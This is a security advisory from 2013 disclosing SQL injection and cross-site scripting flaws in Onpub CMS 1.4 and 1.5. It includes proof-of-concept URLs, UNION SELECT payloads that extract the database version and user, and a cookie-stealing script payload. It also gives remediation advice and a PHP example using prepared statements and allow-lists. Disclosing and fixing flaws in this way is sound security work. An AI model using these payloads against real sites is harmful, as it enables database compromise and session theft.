Document Title:
===============
Onpub CMS 1.4 & 1.5 - Multiple SQL Injection Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1120

Release Date:
=============
2013-10-26

Vulnerability Laboratory ID (VL-ID):
====================================
1120

Common Vulnerability Scoring System:
====================================
8.2

Product & Service Introduction:
===============================
Onpub is a web content management system (CMS) designed for those with intermediate to advanced web development skills
looking to quickly set up custom, dynamic websites that are quick to update and easy to maintain. All Onpub content is
stored in a fast and reliable MySQL database backend. There are many ways to customize and extend Onpub's default
design and functionality via open-standard web development tools and techniques.

Onpub is ideal for those with no desire to implement a CMS from scratch, but who still need a custom, yet agile solution.
Onpub tightly integrates many widely used third-party web apps and scripts into one coherent system to build further upon.

( Copy of the Vendor Homepage: http://onpub.com/ )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple remote web vulnerabilities in the Onpub v1.5 Content Management System web-application.

Vulnerability Disclosure Timeline:
==================================
2013-10-26: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Onpub
Product: Onpub - Content Management System 1.4 Lite and 1.5

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Critical

Technical Details & Description:
================================
1.1
Multiple remote SQL injection web vulnerabilities were detected in the official Onpub v1.4 and v1.5 Content Management System web-application.
The vulnerabilities allow remote attackers to inject their own SQL commands without authorization and compromise the web-application or the web-server DBMS.

The SQL injection vulnerabilities are located in the `websiteID`, `imageID`, `keywords`, `orderBy`, `order` and `articleID` values of the index.php file.
Remote attackers are able to inject their own SQL commands via GET method requests to compromise the database management system or the CMS web-application.
The injection can be performed through the manage path via a GET method request, or through the articleID of the index.php file via a POST method request.
The severity of the remote SQL injection bugs is estimated as critical.

Exploitation of the remote SQL injection web vulnerabilities requires no user interaction and no privileged web-application user account.
Successful exploitation of the remote SQL injection bugs results in compromise of the database management system and of the CMS or web-application.

Vulnerable Module(s):
[+] Manage

Vulnerable File(s):
[+] index.php

Vulnerable Parameter(s):
[+] websiteID
[+] imageID
[+] keywords
[+] orderBy
[+] order
[+] articleID


2.1
A client-side POST injection web vulnerability was detected in the official Onpub v1.4 and v1.5 Content Management System web-application.
The vulnerability allows remote attackers to manipulate web-application to browser requests (client-side) via the POST method.

The client-side cross site scripting web vulnerability is located in the vulnerable `page` parameter of the index.php file (manage module).
Remote attackers can manipulate the `page` parameter of the `index.php` file via a GET method request to compromise the client-side application context.

Successful exploitation of the client-side cross site scripting web vulnerability results in session hijacking, client-side phishing,
client-side unauthorized external redirects and client-side manipulation of the contact form module context.

Vulnerable Module(s):
[+] Manage

Vulnerable File(s):
[+] index.php

Vulnerable Parameter(s):
[+] page

Proof of Concept (PoC):
=======================
1.1
The SQL injection web vulnerabilities can be exploited by remote attackers without a privileged application user account and without user interaction.
For demonstration or to reproduce ...

PoC:
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsite&websiteID=-1%27[SQL-INJECTION VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticles&fullTextSearch=1&keywords=-1%27[SQL-INJECTION VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsites&orderBy=-1%27[SQL-INJECTION VULNERABILITY!]&order=ASC
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticles&orderBy=title&order=[SQL-INJECTION VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImage&imageID=2%27a[SQL-INJECTION VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticle&articleID=1%20[SQL-INJECTION VULNERABILITY!]

onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@version--
onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@database--
onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@user--


2.1
The client-side cross site scripting web vulnerability can be exploited by remote attackers without a privileged application user account
and with low user interaction (a click). For demonstration or to reproduce ...

PoC:
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImages&page=2%27%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImages&page=137%20>"<iframe%20src=http://www.vulnerability-lab.com>

Solution - Fix & Patch:
=======================
1.1
Parse (validate) the vulnerable `websiteID`, `imageID`, `keywords`, `articleID`, `orderBy` and `order` parameters in the index.php file.
Use mysql_real_escape_string() or a prepared statement to prevent SQL injection attacks.

2.1
Parse or encode the vulnerable `page` parameter in the index.php file to prevent client-side cross site scripting attacks.
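
The two fixes above (1.1 and 2.1), worked through as an added PHP example. This is not Onpub's own code: the PDO connection, the table names `websites` and `articles`, the sortable column list and the `ID`/`title` columns are assumptions made for illustration, and the request array is the plain `$_GET`/`$_POST` array that manage/index.php receives.

```php
<?php
// Added example, not Onpub's own code: hardened handling of the manage/index.php
// parameters named in this advisory. The PDO connection, the table names
// (websites, articles) and the sortable column list are assumptions.
declare(strict_types=1);

// ----- 1.1 SQL injection: websiteID / imageID / articleID / keywords / orderBy / order -----

// Numeric identifiers: accept only a non-negative integer, otherwise null.
// The same helper closes websiteID, imageID and articleID; an array value
// (e.g. websiteID[]=1) or a quoted string is rejected by FILTER_VALIDATE_INT.
function readId(array $query, string $name): ?int
{
    if (!isset($query[$name])) {
        return null;
    }
    $id = filter_var($query[$name], FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    return $id === false ? null : $id;
}

// ORDER BY column and direction are SQL identifiers/keywords and cannot be
// bound as prepared-statement parameters, so they are chosen from an allow-list.
function readOrderBy(array $query, array $allowedColumns, string $default): string
{
    $column = $query['orderBy'] ?? $default;
    return (is_string($column) && in_array($column, $allowedColumns, true)) ? $column : $default;
}

function readOrder(array $query): string
{
    $order = $query['order'] ?? 'ASC';
    return (is_string($order) && strtoupper($order) === 'DESC') ? 'DESC' : 'ASC';
}

// Full-text search: the keyword is bound through PDO, and LIKE wildcards in
// user input are escaped so a search for "100%" does not become a wildcard.
function findArticles(PDO $db, array $query): array
{
    $orderBy = readOrderBy($query, ['title', 'created', 'modified'], 'title'); // assumed columns
    $order   = readOrder($query);
    $keyword = is_string($query['keywords'] ?? null) ? $query['keywords'] : '';
    $keyword = addcslashes($keyword, '%_\\');

    // $orderBy and $order come from the fixed allow-lists above, so interpolating
    // them here cannot introduce attacker-controlled SQL.
    $stmt = $db->prepare(
        "SELECT ID, title FROM articles WHERE title LIKE :kw ORDER BY {$orderBy} {$order}"
    );
    $stmt->bindValue(':kw', '%' . $keyword . '%', PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function findWebsite(PDO $db, array $query): ?array
{
    $id = readId($query, 'websiteID');
    if ($id === null) {
        return null; // missing or non-numeric id: no query is issued at all
    }
    $stmt = $db->prepare('SELECT * FROM websites WHERE ID = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// ----- 2.1 cross site scripting: page -----

// `page` only ever selects a result page, so it is parsed as a positive integer.
function readPage(array $query): int
{
    $page = filter_var($query['page'] ?? 1, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $page === false ? 1 : $page;
}

// Anything reflected into the HTML response goes through htmlspecialchars(),
// and the URL part through rawurlencode(), even though $page is already an int.
function renderPageLink(int $page): string
{
    $href = 'index.php?onpub=EditImages&page=' . rawurlencode((string) $page);
    return '<a href="' . htmlspecialchars($href, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">'
        . htmlspecialchars((string) $page, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</a>';
}

// Usage sketch (DSN and credentials are placeholders):
// $db = new PDO('mysql:host=localhost;dbname=onpub;charset=utf8mb4', 'user', 'pass',
//               [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION, PDO::ATTR_EMULATE_PREPARES => false]);
// $site = findWebsite($db, $_GET);       // a non-numeric websiteID yields null; no query is sent
// echo renderPageLink(readPage($_GET));  // a non-numeric page falls back to page 1
```

Two points this example adds to the advisory's own advice: mysql_real_escape_string() only protects values placed inside quotes, so it would not close the unquoted numeric `websiteID` context or the `orderBy`/`order` identifiers, and the whole mysql_* extension was removed in PHP 7; server-side prepared statements (`PDO::ATTR_EMULATE_PREPARES => false`) plus allow-lists for identifiers cover every parameter listed in 1.1. For 2.1, parsing `page` as an integer and encoding every reflected value together mean the `page` parameter can never reach the browser as markup.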

Security Risk:
==============
1.1
The security risk of the remote SQL injection web vulnerabilities is estimated as critical.

1.2
The security risk of the client-side cross site scripting web vulnerability is estimated as medium(-).

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Marcel Bernhardt (smash@evolution-sec.com)
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability Laboratory [Evolution Security]

--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com